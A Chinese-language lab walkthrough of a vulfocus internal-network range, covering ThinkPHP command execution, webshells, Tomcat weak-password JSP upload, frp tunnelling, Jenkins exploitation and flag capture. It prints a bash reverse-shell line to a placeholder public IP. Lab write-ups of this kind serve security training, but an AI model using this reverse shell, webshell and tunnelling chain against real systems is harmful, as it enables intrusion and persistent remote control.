文章目录
- 前言
- 一、开始渗透
- 二、横向移动
- 提交flag
- 总结
前言
使用vulfocus搭建一个内网场景靶场拓扑如下:
入口有两个,一个是think PHP2.x命令执行和5x的命令执行漏洞,后续需要搭建二层隧道进行渗透测试。
一、开始渗透
目标:
访问一下:
使用工具直接拿shell
使用蚁剑连接:
写入冰蝎马做简单代理:
使用冰蝎连接:
做一下信息收集:
上传fscan扫一下:
上传发现冰蝎命令无法使用感觉应该是权限问题:
加权限后一样不能使用,就直接使用蚁剑连接上传fscan:
进入文件检查发现bash没有无法执行:
这里直接用thinkphp2x的漏洞做横向移动:
这里直接上传冰蝎马做代理:
上传fscan:
执行扫描:
二、横向移动
查看扫描结果:
发现tomcat 的ip为192.168.20.1:8080
这里使用冰蝎简单代理给他代理出来:
成功代理到本地的8080端口:
注意这种方式不稳定不怕麻烦使用frp代理
上传webshell:这里是tomcat弱密码漏洞
上传jsp木马:
直接用冰蝎连接:
查看网卡:
网卡中有30网段:测试是否出网
目标可以出网进行反弹shell(因为这里的冰蝎隧道不稳定):
这里使用nc做监听:
bash -i >& /dev/tcp/公网ip/端口 0>&1
这里使用bash编译命令
成功反弹:
这里写入frpc的配置:
使用冰蝎上传frpc包:
这里发现冰蝎的隧道并不稳定上传10M的文件太大导致没有上传成功,换成wget命令:
直接在公网服务器放安装包使用wget命令下载到本地做隧道:
测试一下下载:
在tomcat中下载:
解压并配置frpc:
使用vps上启动frpserver服务:
执行./frpc -c frpc.ini
流量转发过来
使用proxifier代理到vps的服务器:
成功穿出:
接下来做信息收集关闭之前搭建的冰蝎隧道(不稳定且延迟较高):
直接使用冰蝎连接192.168.30.3:8080的马:
这个相对稳定:上传fscan做信息收集
加个权限启动扫描:
Jenkins的ip为192.168.30.1:端口为8080使用poc攻击:
这里直接拿flag:
到这里我们四台的flag全部找到可以提交了:
提交flag
这里只有四个场景但是不知道为啥有5个flag并没有找到另外的flag应该是靶场的bug,这里不在深究
总结
这个场景还是比较简单,如果目标不出网,也可以在tomcat上做frpserver服务,让他又当客户机又当服务器,同时还可通过msf做代理和上线cs做权限维持,下次使用这种方式做测试,试试效果如何。